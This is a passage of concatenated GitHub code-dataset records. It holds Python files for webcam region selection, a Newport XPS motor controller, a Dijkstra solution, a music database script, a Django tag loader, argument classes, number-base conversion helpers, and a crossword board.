_click(self, event):\n logger.debug('Event: %s', event)\n \n if event.inaxes != self.rect.axes: return\n logger.debug('Click at (%d, %d)', event.xdata, event.ydata)\n \n if self.first_click:\n self.x = event.xdata\n self.rect.set_x(self.x)\n self.y = event.ydata\n self.rect.set_y(self.y)\n self.first_click = False\n else:\n self.width = event.xdata - self.x\n self.rect.set_width(self.width)\n self.height = event.ydata - self.y\n self.rect.set_height(self.height)\n self.first_click = True\n \n logger.info('(%d, %d), (%d, %d)',\n self.x, self.y,\n self.x + self.width, self.y + self.height)\n self.rect.figure.canvas.draw()\n \n# def _press(self, event):\n# logger.debug('Event: %s', event)\n# logger.debug('Press %c', event.key)\n# if event.key == \"~\":\n# self.label = self.label[:-1]\n# else:\n# self.label += event.key\n# self.rect.set_label(self.label)\n \ncap = cv2.VideoCapture(0)\n \n# Capture a frame\nret, frame = cap.read()\n#cap.release()\nb,g,r = cv2.split(frame)\nimage = cv2.merge([r,g,b])\n \n# Plot image\n\nmpl.rcParams['toolbar'] = 'None'\nfig = plt.figure()\nax_img = fig.add_subplot(111)\nax_img.imshow(image)\n \n# Plot bounding box and wait for events\nax_bb = fig.add_subplot(111)\nax_bb.set_title('Click to choose bounding box:')\nx, y, width, height = 10, 10, 50, 50\nrect = ax_bb.add_patch(mpl.patches.Rectangle((x, y),\n width,\n height,\n fill = False))\nrect_builder = RectBuilder(rect, x, y, width, height)\nplt.show()\nx1, y1 = int(rect.get_x()), int(rect.get_y())\nx2, y2 = int(x1 + rect.get_width()), int(y1 + rect.get_height())\n \n#cropped_image = image[y1:y2, x1:x2]\n#fig = plt.figure()\n#ax_img = fig.add_subplot(111)\n#ax_img.imshow(cropped_image)\n#plt.show()\n \n#cap = cv2.VideoCapture(0)\nwhile(True):\n # Read webcam frames and decode\n ret, frame = cap.read()\n# b,g,r = cv2.split(frame)\n# RGB = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n image_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n image_cropped = image_gray[y1:y2, x1:x2]\n #image_scaled = cv2.resize(image_cropped, )\n cv2.imshow('frame', image_cropped)\n \n # Scan QRcode from image_gray\n \n# # Save image and QRCode data\n# img_fname = str(int(time.time())) + \".png\"\n# cv2.imwrite(img_fname, image_cropped)\n# time.sleep(2)\n# k = cv2.waitKey(30) & 0xff\n k = cv2.waitKey()\n if k == ord('q'):\n break\n \ncap.release()\ncv2.destroyAllWindows()","repo_name":"gjmulder/meter-pop","sub_path":"webcam_meter_finder.py","file_name":"webcam_meter_finder.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40874334149","text":"from __future__ import print_function\nfrom __future__ import absolute_import\n\nimport gevent\n\nfrom bliss.common import log as elog\nfrom bliss.common.axis import AxisState\nfrom bliss.common.hook import MotionHook\nfrom bliss.common.utils import object_method\nfrom bliss.controllers.motor import Controller\nfrom bliss.controllers.motors.newport.XPS import XPS\n\n\"\"\"\nBliss controller for XPS-Q motor controller.\n\ncontroller:\n class: NewportXPS\n name: xps-q\n description: Newport-Q test\n tcp: 160.103.146.95:5001\n nbAxes: 1\n axes:\n -\n name: omega\n group: M1\n address: 1 # first address should be 1\n velocity: 70.0\n acceleration: 320.0\n minJerkTime: 0.005\n maxJerkTime: 0.05\n steps_per_unit: 1\n backlash: 0.0\n low_limit: 0\n high_limit: 360\n offset: 0.0\n unit: deg\n autoHome: True\n user_tag: Omega\n gpio_conn: GPIO3 # GPIO connector for constant velocity pulse\n motion_hooks:\n - $newport_hook # execute post motion\n\"\"\"\n\n\nclass NewportHook(MotionHook):\n def __init__(self, name, config):\n self.config = config\n self.name = name\n super(NewportHook, self).__init__()\n\n def post_move(self, motion_list):\n \"\"\"\n Newport motors report motion complete when in actual\n fact (for DC motors at least) there is a settling time.\n \"\"\"\n gevent.sleep(1.0)\n\n\nclass NewportXPS(Controller):\n def __init__(self, *args, **kwargs):\n Controller.__init__(self, *args, **kwargs)\n elog.level(10)\n\n def initialize(self):\n elog.debug(\"initialize() called\")\n comm_cfg = ({'tcp': {'url': self.config.get('tcp')}})\n self.__nbAxes = self.config.get('nbAxes', int)\n self.__xps = XPS(comm_cfg)\n\n def finalize(self):\n elog.debug(\"finalize() called\")\n self.__sock.close()\n\n # Initialize each axis.\n def initialize_axis(self, axis):\n elog.debug(\"initialize_axis() called\")\n axis.channel = axis.config.get(\"address\")\n axis.group = axis.config.get(\"group\")\n axis.autoHome = axis.config.get(\"autoHome\")\n axis.minJerkTime = axis.config.get(\"minJerkTime\")\n axis.maxJerkTime = axis.config.get(\"maxJerkTime\")\n axis.gpioConn = axis.config.get(\"gpio_conn\")\n\n error, reply = self.__xps.GroupInitialize(axis.group)\n if error == 0:\n elog.debug(\"NewportXPS: initialisation successful\")\n elif error == -22:\n elog.debug(\"NewportXPS: Controller already initialised\")\n else:\n elog.error(\"NewportXPS: Controller initialise failed: \", error)\n\n if axis.autoHome:\n self.home_search(axis, False)\n self.read_velocity(axis)\n\n elog.debug(\"initialize_axis() complete\")\n\n def finalize_axis(self):\n elog.debug(\"finalize_axis() called\")\n\n def initialize_encoder(self, encoder):\n elog.debug(\"initialize_encoder() called\")\n\n def read_position(self, axis):\n elog.debug(\"read_position() called\")\n reply = self.__xps.GroupPositionCurrentGet(axis.group, self.__nbAxes)\n if reply[0] != 0:\n elog.error(\"NewportXPS Error: Failed to read position\", reply[1])\n else:\n return reply[int(axis.channel)]\n\n def read_velocity(self, axis):\n elog.debug(\"read_velocity() called\")\n results = self.__xps.PositionerSGammaParametersGet(axis.group + '.' + axis.name)\n print(results)\n if results[0] != 0:\n elog.error(\"NewportXPS Error: Unexpected response to read velocity\", results[1])\n else:\n print(results)\n return results[1]\n\n def set_velocity(self, axis, velocity):\n elog.debug(\"set_velocity() called\")\n error, reply = self.__xps.PositionerSGammaParametersSet(axis.group + '.' + axis.name,\n velocity,\n axis.acceleration(),\n axis.minJerkTime,\n axis.maxJerkTime)\n if error != 0:\n elog.error(\"NewportXPS Error: Unexpected response to setting velocity\", reply)\n\n def read_acceleration(self, axis):\n elog.debug(\"read_acceleration() called\")\n results = self.__xps.PositionerSGammaParametersGet(axis.group + '.' + axis.name)\n print(results)\n if results[0] != 0:\n elog.error(\"NewportXPS Error: Unexpected response to read acceleration\", results[1])\n else:\n return results[2]\n\n def set_acceleration(self, axis, acceleration):\n elog.debug(\"set_acceleration() called\")\n error, reply = self.__xps.PositionerSGammaParametersSet(axis.group + '.' + axis.name,\n axis.velocity(),\n acceleration,\n axis.minJerkTime,\n axis.maxJerkTime)\n if error != 0:\n elog.error(\"NewportXPS Error: Unexpected response to setting acceleration\", reply)\n\n def start_one(self, motion):\n elog.debug(\"start_one() called\")\n self.cv_trigger(motion.axis)\n motor_name = motion.axis.group + \".\" + motion.axis.name\n error, reply = self.__xps.GroupMoveAbsolute(motor_name, [motion.target_pos, ])\n print(\"Reply:\", reply)\n if error != 0:\n elog.error(\"NewportXPS Error: Unexpected response to move absolute\", reply)\n\n def start_all(self, *motion_list):\n elog.debug(\"start_all() called\")\n target_positions = [0, 0]\n for motion in motion_list:\n target_positions[int(motion.axis.channel)-1] = motion.target_pos\n error, reply = self.__xps.GroupMoveAbsolute(motion.axis.group, target_positions)\n if error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n\n def stop(self, motion):\n elog.debug(\"stop() called\")\n error, reply = self.__xps.GroupMoveAbort(motion.axis.group + '.' + motion.axis.name)\n if error == -22:\n elog.info(\"NewportXPS: All positioners idle\")\n elif error != 0 and error != -22:\n elog.error(\"NewportXPS Error: \", reply)\n\n def stop_all(self, *motion_list):\n elog.debug(\"stop_all() called\")\n error, reply = self.__xps.GroupMoveAbort(motion_list[0].axis.group)\n if error == -22:\n elog.info(\"NewportXPS: All positioners idle\")\n elif error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n\n def home_search(self, axis, switch):\n elog.debug(\"home_search() called\")\n # Moves the motor to a repeatable starting location allows\n # homing only once after a power cycle.\n error, reply = self.__xps.GroupHomeSearch(axis.group)\n if error == 0:\n elog.info(\"NewportXPS: homing successful\")\n elif error == -22:\n elog.info(\"NewportXPS: Controller already homed\")\n else:\n elog.error(\"NewportXPS: Controller homing failed: \", error)\n\n def home_state(self, axis):\n elog.debug(\"home_state() called\")\n return self.state(axis)\n\n def get_info(self, axis):\n elog.debug(\"get_info() called\")\n return self.__xps.GetLibraryVersion()\n\n def state(self, axis):\n elog.debug(\"state() called\")\n error, status = self.__xps.GroupStatusGet(axis.group)\n if error != 0:\n elog.error(\"NewportXPS Error: Failed to read status\", status)\n return AxisState('FAULT')\n if status in [0, # NOTINIT state\n 1, # NOTINIT state due to an emergency brake: see positioner status\n 2, # NOTINIT state due to an emergency stop: see positioner status\n 3, # NOTINIT state due to a following error during homing\n 4, # NOTINIT state due to a following error\n 5, # NOTINIT state due to an homing timeout\n 6, # NOTINIT state due to a motion done timeout during homing\n 7, # NOTINIT state due to a KillAll command\n 8, # NOTINIT state due to an end of run after homing\n 9, # NOTINIT state due to an encoder calibration error\n 50, # NOTINIT state due to a mechanical zero inconsistency during homing\n 52, # NOTINIT state due to a clamping timeout\n 60, # NOTINIT state due to a group interlock error on not reference state\n 61, # NOTINIT state due to a group interlock error during homing\n 63, # NOTINIT state due to a motor initialization error\n 66, # NOTINIT state due to a perpendicularity error homing\n 67, # NOTINIT state due to a master/slave error during homing\n 71, # NOTINIT state from scaling calibration\n 72, # NOTINIT state due to a scaling calibration error\n 83, # NOTINIT state due to a group interlock error\n 106]: # Not initialized state due to an error with GroupKill or KillAll command\n return AxisState((\"NOTINIT\", \"Not Initialised\"))\n if status in [10, # Ready state due to an AbortMove command\n 11, # Ready state from homing\n 12, # Ready state from motion\n 13, # Ready State due to a MotionEnable command\n 14, # Ready state from slave\n 15, # Ready state from jogging\n 16, # Ready state from analog tracking\n 17, # Ready state from trajectory\n 18, # Ready state from spinning\n 19, # Ready state due to a group interlock error during motion\n 56, # Ready state from clamped\n 70, # Ready state from auto-tuning\n 77, # Ready state from excitation signal generation\n 79]: # Ready state from focus\n return AxisState(\"READY\")\n if status in [20, # Disable state\n 21, # Disabled state due to a following error on ready state\n 22, # Disabled state due to a following error during motion\n 23, # Disabled state due to a motion done timeout during moving\n 24, # Disabled state due to a following error on slave state\n 25, # Disabled state due to a following error on jogging state\n 26, # Disabled state due to a following error during trajectory\n 27, # Disabled state due to a motion done timeout during trajectory\n 28, # Disabled state due to a following error during analog tracking\n 29, # Disabled state due to a slave error during motion\n 30, # Disabled state due to a slave error on slave state\n 31, # Disabled state due to a slave error on jogging state\n 32, # Disabled state due to a slave error during trajectory\n 33, # Disabled state due to a slave error during analog tracking\n 34, # Disabled state due to a slave error on ready state\n 35, # Disabled state due to a following error on spinning state\n 36, # Disabled state due to a slave error on spinning state\n 37, # Disabled state due to a following error on auto-tuning\n 38, # Disabled state due to a slave error on auto-tuning\n 39, # Disable state due to an emergency stop on auto-tuning state\n 58, # Disabled state due to a following error during clamped\n 59, # Disabled state due to a motion done timeout during clamped\n 74, # Disable state due to a following error on excitation signal generation state\n 75, # Disable state due to a master/slave error on excitation signal generation state\n 76, # Disable state due to an emergency stop on excitation signal generation state\n 80, # Disable state due to a following error on focus state\n 81, # Disable state due to a master/slave error on focus state\n 82, # Disable state due to an emergency stop on focus state\n 84, # Disable state due to a group interlock error during moving\n 85, # Disable state due to a group interlock error during jogging\n 86, # Disable state due to a group interlock error on slave state\n 87, # Disable state due to a group interlock error during trajectory\n 88, # Disable state due to a group interlock error during analog tracking\n 89, # Disable state due to a group interlock error during spinning\n 90, # Disable state due to a group interlock error on ready state\n 91, # Disable state due to a group interlock error on auto-tuning state\n 92, # Disable state due to a group interlock error on excitation signal generation state\n 93, # Disable state due to a group interlock error on focus state\n 94, # Disabled state due to a motion done timeout during jogging\n 95, # Disabled state due to a motion done timeout during spinning\n 96, # Disabled state due to a motion done timeout during slave mode\n 97, # Disabled state due to a ZYGO error during motion\n 98, # Disabled state due to a master/slave error during trajectory\n 99, # Disable state due to a ZYGO error on jogging state\n 100, # Disabled state due to a ZYGO error during analog tracking\n 101, # Disable state due to a ZYGO error on auto-tuning state\n 102, # Disable state due to a ZYGO error on excitation signal generation state\n 103]: # Disabled state due to a ZYGO error on ready state\n return AxisState((\"DISABLED\", \"Disabled\"))\n if status in [43, # Homing state\n 44, # Moving state\n 45, # Trajectory state\n 46, # Slave state due to a SlaveEnable command\n 47, # Jogging state due to a JogEnable command\n 48, # Analog tracking state due to a TrackingEnable command\n 49, # Analog interpolated encoder calibrating state\n 51, # Spinning state due to a SpinParametersSet command\n 64]: # Referencing state\n return AxisState('BUSY')\n if status in [40, # Emergency braking\n 41, # Motor initialization state\n 42, # Not referenced state\n 55, # Clamped\n 65, # Clamping initialization\n 68, # Auto-tuning state\n 69, # Scaling calibration state\n 73, # Excitation signal generation state\n 78, # Focus state\n 104, # Driver initialization\n 105]: # Jitter initialization\n return AxisState(\"UNDECIDED\", \"Not categorised yet\")\n return AxisState(\"UNKNOWN\", \"This should not happen\")\n\n @object_method()\n def abort(self, axis):\n elog.debug(\"abort() called\")\n error, reply = self.__xps.GroupKill(axis.group)\n if error != 0:\n elog.error(\"NewportXPS Error: abort failed\", reply)\n\n @object_method()\n def cv_trigger(self, axis):\n \"\"\"\n Generate a pulses on the GPIO connector when the positioner reaches\n constant velocity motion.\n \"\"\"\n elog.debug(\"cv_trigger start\")\n motor_name = axis.group + \".\" + axis.name\n category = \".SGamma\"\n event1 = motor_name + category + \".ConstantVelocityStart\"\n action = axis.gpioConn + \".DO.DOPulse\"\n error, reply = self.__xps.EventExtendedConfigurationTriggerSet(\n [event1], [0], [0], [0], [0])\n if error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n else:\n error, reply = self.__xps.EventExtendedConfigurationActionSet(\n [action], [4], [0], [0], [0])\n if error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n else:\n error, reply = self.__xps.EventExtendedStart()\n if error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n elog.debug(\"cv_trigger eventid \", reply)\n elog.debug(\"cv_trigger stop\")\n\n @object_method()\n def enable_position_compare(self, axis, start, stop, step):\n \"\"\"\n Generate output pulse on the PCO connector. The first pulse is output when\n the positioner crosses the start position and the last pulse is given at the\n stop position. The difference between the start and the stop position should\n be an integer multiple of the position step.\n\n example: Pos.setPositionCompare(5.0, 25.0, 0.002)\n will generate pulses between 5mm and 25mm every 0.002mm\n \"\"\"\n motor_name = axis.group + \".\" + axis.name\n elog.debug(motor_name, start, stop, step)\n error, reply = self.__xps.PositionerPositionCompareSet(motor_name, start, stop, step)\n if error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n else:\n error, reply = self.__xps.PositionerPositionCompareEnable(motor_name)\n if error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n\n @object_method()\n def disable_position_compare(self, axis):\n \"\"\"\n Disable output pulses on the PCO connector\n \"\"\"\n motor_name = axis.group + \".\" + axis.name\n error, reply = self.__xps.PositionerPositionCompareDisable(motor_name)\n if error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n\n @object_method()\n def event_list(self, axis):\n error, reply = self.__xps.EventExtendedAllGet()\n if error == -83:\n elog.debug(\"NewportXPS: No events in list\")\n elif error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n else:\n elog.debug(\"Event id list: \", reply)\n\n @object_method()\n def event_remove(self, axis, id):\n error, reply = self.__xps.EventExtendedRemove(id)\n","repo_name":"tiagocoutinho/bliss","sub_path":"bliss/controllers/motors/newport/NewportXPS.py","file_name":"NewportXPS.py","file_ext":"py","file_size_in_byte":19086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74118814009","text":"import sys\nimport heapq\ninput = sys.stdin.readline\nINF = int(1e9)\n\nn,e = map(int,input().split())\ngraph = [[] for i in range(n + 1)]\nfor i in range(e):\n a,b,c = map(int,input().split())\n graph[a].append((b,c))\n graph[b].append((a,c))\n\ndef dijkstra(start,finish,n):\n distance = [INF for i in range(n + 1)]\n q = []\n heapq.heappush(q,(0,start))\n distance[start] = 0\n while q:\n dist, now = heapq.heappop(q)\n if distance[now] < dist:\n continue\n for i in graph[now]:\n cost = dist + i[1]\n if cost < distance[i[0]]:\n distance[i[0]] = cost\n heapq.heappush(q,(cost,i[0]))\n return distance[finish]\n\nv1, v2 = map(int,input().split())\n\nv1v2 = dijkstra(v1,v2,n)\nv1_1 = dijkstra(v1,1,n)\nv1_n = dijkstra(v1,n,n)\nv2_1 = dijkstra(v2,1,n)\nv2_n = dijkstra(v2,n,n)\n\nresult = v1v2\n\nif v1_1 + v2_n > v2_1 + v1_n:\n result += v2_1 + v1_n\nelse:\n result += v1_1 + v2_n\n\nif result == INF:\n result = -1\n\nprint(result)","repo_name":"Yun-YeoJun/Codeforces","sub_path":"#805/bj1504.py","file_name":"bj1504.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13649495065","text":"import pdb \nfrom models.artists import Artists\nimport repositories.artist_repository as artist_repository \nfrom models.albums import Albums\nimport repositories.album_repository as album_repository \n\nalbum_repository.delete_all()\nartist_repository.delete_all()\n\nartist1 = Artists(\"Oasis\")\nartist_repository.save(artist1)\nartist2 = Artists(\"Metallica\")\nartist_repository.save(artist2)\n\nalbum1 = Albums(\"Time Flies...1994-2009\",\"Rock\",\"Oasis\")\nalbum_repository.save(album1)\nalbum2 = Albums(\"Load\",\"Rock\",\"Metallica\")\nalbum_repository.save(album2)\n\nfound_artist = artist_repository.select(artist1.id)\nfound_album = album_repository.select(album1.id)\n\nselected_album = album_repository.select_all()\nselected_artist = artist_repository.select_all()\n\n\npdb.set_trace()","repo_name":"JordanMcK5/Week4_Music_DB_Lab","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20431835106","text":"import json\n\nfrom django.core.management.base import BaseCommand\nfrom recipes.models import Tag\n\n\nclass Command(BaseCommand):\n help = 'Load tags from JSON file into database'\n\n def handle(self, *args, **options):\n with open(\n 'data/tags.json',\n 'r',\n encoding='UTF-8'\n ) as tags:\n data = json.load(tags)\n for note in data:\n try:\n Tag.objects.get_or_create(**note)\n print(f'{note[\"name\"]} в базе')\n except Exception as error:\n print(f'Ошибка при добавлении {note[\"name\"]}.\\n'\n f'Текст - {error}')\n\n print('Загрузка тэгов завершена')\n","repo_name":"AlexandrSakulin/foodgram-project-react","sub_path":"backend/recipes/management/commands/load_tags.py","file_name":"load_tags.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17439664711","text":"\n\nfrom .common import *\n\n\nclass ArgumentTypes(object):\n \n _atlut = None\n \n def __init__(self, *initializer):\n self._atlut = {}\n for cls in initializer:\n self.add(cls)\n \n def add(self, cls):\n if not isinstance(cls, Argument):\n raise ValueError(\"Invalid type, expected a subclass of Argument\" \\\n \" but found: {:s}\".format(name))\n name = cls.__name__\n if name in self._atlut:\n if self._atlut[name] is not cls:\n raise ValueError(\"Duplicate Argument type {:s}\".format(name))\n continue\n self._atlut[cls.__name__] = cls\n\n\nclass Argument(object):\n \n @classmethod\n def from_token(cls, whole, prefix=None, sep=None, suffix=None):\n return cls(whole)\n \n _value = None\n _type = None\n \n @property\n def value(self):\n return self._type(self._value) if self._type else self._value\n \n def __init__(self, value, astype=None):\n if astype is None:\n astype = type(value)\n self._value = str(value)\n self._type = astype\n \n def __str__(self):\n return self._value\n\n\nclass KeyWordArgument(Argument):\n \n @classmethod\n def from_token(cls, whole, prefix, sep, suffix):\n if sep not in \":=\":\n raise ValueError('invalid {:s} token: {:s}'.format(cls.__name__, whole))\n return cls(prefix, suffix)\n \n _keyword = None\n \n def key(self):\n return self._keyword\n \n def __init__(self, key, value):\n if not key or not type(key) is str:\n raise ValueError('key must be a string but found {:s}'.fomrat(key))\n self._key = key\n super().__init__(value or None)\n\n\nclass OptionArgument(KeyWordArgument):\n \n @classmethod\n def from_token(cls, whole, prefix, sep, suffix):\n if sep not in \":=\":\n raise ValueError('invalid {:s} token: {:s}'.format(cls.__name__, whole))\n return cls(prefix, sep, suffix)\n \n _operator = None\n \n def __init__(self, key, operator, value):\n if operator and not type(key) is str:\n raise ValueError('operator must be a string but found {:s}' \\\n .fomrat(operator))\n self._operator = operator or None\n super().__init__(value)\n \n\n\nclass CommandArgument(OptionArgument):\n \n pass\n\n\n\n","repo_name":"ismaelharunid/argyle","sub_path":"pyimp/argyle/arguments.py","file_name":"arguments.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9096818012","text":"def convertBinToOct(num):\n # print the steps to convert bin to oct\n # Convert every 3 binary digits (from bit0) to octal digit (see conversion table below):\n dict = {'000': '0', '001': '1', '010': '2', '011': '3',\n '100': '4', '101': '5', '110': '6', '111': '7'}\n num = str(num)\n if len(num) % 3 == 1:\n num = '00' + num\n elif len(num) % 3 == 2:\n num = '0' + num\n num = num[::-1]\n group = []\n for i in range(0, len(num), 3):\n group.append(num[i:i+3])\n group = group[::-1]\n # reverse each string in group\n for i in range(len(group)):\n group[i] = group[i][::-1]\n\n explain = []\n res = ''\n for i in group:\n res += dict[i]\n explain.append(f'{i} = {dict[i]}')\n return ' | '.join(explain)\n\n\ndef convertBinToDec(num):\n # print the steps to convert bin to dec\n # The decimal number is equal to the sum of binary digits (dn) times their power of 2 (2n):\n num = str(num)\n length = len(num)\n res = 0\n explain = []\n for i in range(length):\n explain.append(f'{num[i]}*2^{length-i-1}')\n res += int(num[i]) * 2**(length-i-1)\n\n return (' + '.join(explain))\n\n\ndef convertBinToHex(num):\n # print the steps to convert bin to hex\n # Convert every 4 binary digits (from bit0) to hexadecimal digit (see conversion table below):\n dict = {'0000': '0', '0001': '1', '0010': '2', '0011': '3',\n '0100': '4', '0101': '5', '0110': '6', '0111': '7',\n '1000': '8', '1001': '9', '1010': 'A', '1011': 'B',\n '1100': 'C', '1101': 'D', '1110': 'E', '1111': 'F'}\n num = str(num)\n if len(num) % 4 == 1:\n num = '000' + num\n elif len(num) % 4 == 2:\n num = '00' + num\n elif len(num) % 4 == 3:\n num = '0' + num\n num = num[::-1]\n group = []\n for i in range(0, len(num), 4):\n group.append(num[i:i+4])\n group = group[::-1]\n # reverse each string in group\n for i in range(len(group)):\n group[i] = group[i][::-1]\n\n explain = []\n res = ''\n for i in group:\n res += dict[i]\n explain.append(f'{i} = {dict[i]}')\n\n return ' | '.join(explain)\n\n\ndef convertOctToBin(num):\n # print the steps to convert oct to bin\n # Convert every octal digit to binary (see conversion table below):\n dict = {'0': '000', '1': '001', '2': '010', '3': '011',\n '4': '100', '5': '101', '6': '110', '7': '111'}\n num = str(num)\n res = ''\n explain = []\n for i in num:\n res += dict[i]\n explain.append(f'{i} = {dict[i]}')\n return ' | '.join(explain)\n\n\ndef convertOctToDec(num):\n # print the steps to convert oct to dec\n # The decimal number is equal to the sum of octal digits (dn) times their power of 8 (8n):\n num = str(num)\n length = len(num)\n res = 0\n explain = []\n for i in range(length):\n explain.append(f'{num[i]}*8^{length-i-1}')\n res += int(num[i]) * 8**(length-i-1)\n return ' + '.join(explain)\n\n\ndef convertOctToHex(num):\n # print the steps to convert oct to hex\n # Convert octal to binary, then binary to hexadecimal:\n explain, res = convertOctToBin(num)\n\n explain2, res = convertBinToHex(res)\n return explain, explain2, res\n\n\ndef convertDecToBin(num):\n num = int(num)\n res = ''\n explain = []\n\n bit = 0\n while num != 0:\n res += str(num % 2)\n explain.append(\n f'{num:8} / 2 {(num//2):8} {(num % 2):6} {bit:3}')\n num = num // 2\n bit += 1\n return \"Division by 2 Quotient Remainder Bit #\\n\" + '\\n'.join(explain), res[::-1]\n\n\ndef convertDecToOct(num):\n # print the steps to convert dec to oct\n # Divide the number by 8 until you get a quotient of 0.\n # The remainders are the octal digits in reverse order.\n num = int(num)\n res = ''\n explain = []\n\n bit = 0\n while num != 0:\n res += str(num % 8)\n explain.append(\n f'{num:8} / 8 {(num//8):8} {(num % 8):6} {bit:3}')\n num = num // 8\n bit += 1\n return \"Division by 8 Quotient Remainder Bit #\\n\" + '\\n'.join(explain)\n\n\ndef convertDecToHex(num):\n num = int(num)\n res = ''\n explain = []\n dict = {10: 'A', 11: 'B', 12: 'C', 13: 'D', 14: 'E', 15: 'F'}\n bit = 0\n while num != 0:\n if num % 16 >= 10:\n res += dict[num % 16]\n else:\n res += str(num % 16)\n explain.append(\n f'{num:8} / 16 {(num//16):8} {(num % 16):6} {bit:3}')\n num = num // 16\n bit += 1\n return \"Division by 16 Quotient Remainder Bit #\\n\" + '\\n'.join(explain)\n\n\n\ndef convertHexToBin(num):\n # print the steps to convert hex to bin\n # Convert every hexadecimal digit to binary (see conversion table below):\n dict = {'0': '0000', '1': '0001', '2': '0010', '3': '0011',\n '4': '0100', '5': '0101', '6': '0110', '7': '0111',\n '8': '1000', '9': '1001', 'A': '1010', 'B': '1011',\n 'C': '1100', 'D': '1101', 'E': '1110', 'F': '1111'}\n num = str(num)\n temp = ''\n explain = []\n for i in num:\n temp += dict[i]\n explain.append(f'{i} = {dict[i]}')\n res = []\n for i in range(0, len(temp), 4):\n res.append(temp[i:i+4])\n\n return ' | '.join(explain)\n\n\n\ndef convertHexToOct(num):\n # print the steps to convert hex to oct\n # Convert hexadecimal to binary, then binary to octal:\n # print(\"Convert hexadecimal to binary, then binary to octal:\")\n explain, res = convertHexToBin(num)\n res = ''.join(res.split(' '))\n explain2, res = convertBinToOct(res)\n return explain, explain2\n\n\n\ndef convertHexToDec(num):\n # print the steps to convert hex to dec\n # The decimal number is equal to the sum of hexadecimal digits (dn) times their power of 16 (16n):\n num = str(num)\n length = len(num)\n res = 0\n explain = []\n dict = {'A': 10, 'B': 11, 'C': 12, 'D': 13, 'E': 14, 'F': 15}\n for i in range(length):\n if num[i] in dict:\n res += dict[num[i]] * 16**(length-i-1)\n explain.append(f'{dict[num[i]]}*16^{length-i-1}')\n else:\n res += int(num[i]) * 16**(length-i-1)\n explain.append(f'{num[i]}*16^{length-i-1}')\n\n return ' + '.join(explain)","repo_name":"Rohit-2412/Number-System-Convertor","sub_path":"conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":6301,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"34055046962","text":"import sys\nimport os\nfrom transformers import optimization\n\nrootPath = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(rootPath)\n\nimport torch\nfrom torch import nn\nimport pandas as pd\nfrom data_process import *\nfrom similarity import *\n\n\n# 训练模型\ndef train():\n model = albert_similarity_model()\n\n train, test_token,test_mask,test_seg_ment, eval_y = load_data()\n\n eval_token = torch.tensor(test_token)\n eval_mask = torch.tensor(test_mask)\n eval_seg_ment = torch.tensor(test_seg_ment)\n if torch.cuda.is_available():\n model = model.cuda()\n eval_token = eval_token.cuda()\n eval_mask = eval_mask.cuda()\n eval_seg_ment = eval_seg_ment.cuda()\n\n optimizer = optimization.AdamW(model.parameters(), lr=1e-3)\n loss_func = nn.BCELoss()\n\n best_acc = 0\n\n for epoch in range(8):\n for step, ((token,mask,seg_ment),label) in enumerate(train):\n if torch.cuda.is_available():\n token = torch.tensor(token).cuda()\n mask = torch.tensor(mask).cuda()\n seg_ment = torch.tensor(seg_ment).cuda()\n label = torch.tensor(label).cuda()\n output = model(token,mask,seg_ment)\n loss = loss_func(output, label.float())\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if step % 20 == 0:\n test_output = model(eval_token,eval_mask,eval_seg_ment)\n pred_y = (test_output.cpu().data.numpy() > 0.5).astype(int)\n accuracy = float((pred_y == eval_y).astype(int).sum()) / float(eval_y.size)\n if accuracy > best_acc:\n best_acc = accuracy\n torch.save(model.state_dict(), 'model_s.pth')\n print('save model, accuracy: %.3f' % accuracy)\n print('Epoch: ', epoch, '| train loss: %.4f' % loss.cpu().data.numpy(),\n '| test accuracy: %.3f' % accuracy)\n\n\nif __name__ == '__main__':\n train()","repo_name":"Suiyiaixiaoyu/QAMaster","sub_path":"albert_similarity/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"39360975115","text":"import numpy as np\nimport copy\nimport json\nimport jsonpickle\n\n\n# 1. Heuristik: möglichst kleines Rechteck -> Graph: hier wirds schwierig\n# 2. Heuristik: möglichst viele Überschneidungen -> Graph: Anzahl der Knoten\n\n\nclass Position:\n __row: int\n __col: int\n\n def __init__(self, row: int = -1, col: int = -1):\n self.__row = row\n self.__col = col\n\n def get_row(self):\n return self.__row\n\n def get_col(self):\n return self.__col\n\n def set_row(self, row):\n self.__row = row\n\n def set_col(self, col):\n self.__col = col\n\n\nclass Board:\n __size: int\n grid: np.chararray\n\n def __init__(self, size: int):\n self.__size = size\n self.__create_grid()\n\n def __create_grid(self):\n self.grid = np.chararray((self.__size, self.__size), unicode=True)\n\n def print_board(self):\n for row in self.grid:\n print(row)\n\n def get_size(self):\n return self.__size\n\n def put(self, x, y, char):\n pass\n\n\nclass CandidatePlacement:\n __word: str\n __position: Position\n __direction: str\n __hits: list\n\n def __init__(self, word: str = \"\", position: Position = Position(), direction: str = \"\", hits = []):\n self.__word = word\n 